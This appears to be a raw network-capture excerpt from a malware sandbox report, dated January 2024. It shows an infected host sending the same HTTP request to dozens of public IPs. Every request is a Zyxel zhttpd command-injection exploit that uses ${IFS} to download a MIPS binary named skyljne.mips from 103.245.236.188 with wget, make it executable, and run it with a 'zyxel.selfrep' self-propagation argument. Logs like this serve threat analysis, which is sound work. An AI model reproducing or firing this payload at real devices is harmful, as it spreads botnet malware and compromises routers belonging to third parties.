                                    Jan 13, 2024 19:02:32.129554033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3964192.168.2.1337666180.16.18.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129570961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3965192.168.2.1343176178.22.254.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129610062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3966192.168.2.1357052158.23.172.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129631996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3967192.168.2.135641674.145.239.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129683971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3968192.168.2.1354326189.198.199.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129764080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3969192.168.2.1344582130.113.109.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129784107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3970192.168.2.135578647.205.178.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129842043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3971192.168.2.1340564222.70.85.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129873991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3972192.168.2.1356256109.18.210.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129923105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3973192.168.2.1346988200.245.110.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129947901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3974192.168.2.1349654156.3.123.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130007982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3975192.168.2.135131012.253.132.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130037069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3976192.168.2.1336648114.62.8.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130103111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3977192.168.2.1346762210.147.182.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130111933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3978192.168.2.135600846.198.193.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130162001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3979192.168.2.1347724198.61.100.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130191088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3980192.168.2.1340898156.192.251.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130223989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3981192.168.2.133293265.177.180.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130283117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3982192.168.2.1344662124.38.231.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130316019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3983192.168.2.135206673.232.181.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130352974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3984192.168.2.1334072205.29.3.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130384922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3985192.168.2.1339974108.122.80.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130414009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3986192.168.2.135140089.15.71.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130472898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3987192.168.2.1341478119.211.34.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130495071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3988192.168.2.1338950110.148.9.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130526066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3989192.168.2.1342680200.181.210.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130563974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3990192.168.2.1355680190.158.142.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130606890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3991192.168.2.1342658192.180.218.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130616903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3992192.168.2.1333500115.30.146.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130681038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3993192.168.2.1345686184.27.217.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130737066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3994192.168.2.134387847.248.56.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130758047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3995192.168.2.1357648137.111.221.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130795002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3996192.168.2.135921475.90.60.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130817890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3997192.168.2.1351792129.164.35.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130841970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3998192.168.2.1350266113.3.53.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130927086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3999192.168.2.1348312175.20.5.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130956888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4000192.168.2.135987239.37.9.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.130986929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4001192.168.2.133765070.191.145.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131021976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4002192.168.2.133323083.159.223.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131058931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4003192.168.2.1333416132.141.102.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131105900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4004192.168.2.134188624.134.182.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131119013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4005192.168.2.136048023.162.250.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131170034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4006192.168.2.133988085.245.54.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131186962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4007192.168.2.1351338166.67.233.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131225109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4008192.168.2.134436044.13.231.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131242990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4009192.168.2.1339686211.141.15.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131266117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4010192.168.2.1356990152.43.203.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131366014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4011192.168.2.134132023.235.165.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131367922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4012192.168.2.1346634153.176.42.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131393909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4013192.168.2.1347410106.221.156.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131450891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4014192.168.2.1358856133.41.76.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131485939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4015192.168.2.135197050.183.176.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131519079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4016192.168.2.135319851.32.217.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131576061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4017192.168.2.135099660.255.115.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131599903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4018192.168.2.1349804104.101.194.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131625891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4019192.168.2.134870025.169.98.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131675959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4020192.168.2.135722699.110.83.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131705046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4021192.168.2.1339690112.142.96.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131762981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4022192.168.2.135918437.71.206.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131793976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4023192.168.2.1349636172.108.24.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131824970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4024192.168.2.1359606137.142.221.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131882906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4025192.168.2.135305892.16.115.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.131932974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4026192.168.2.135929252.123.142.151443
                                    TimestampBytes transferredDirectionData
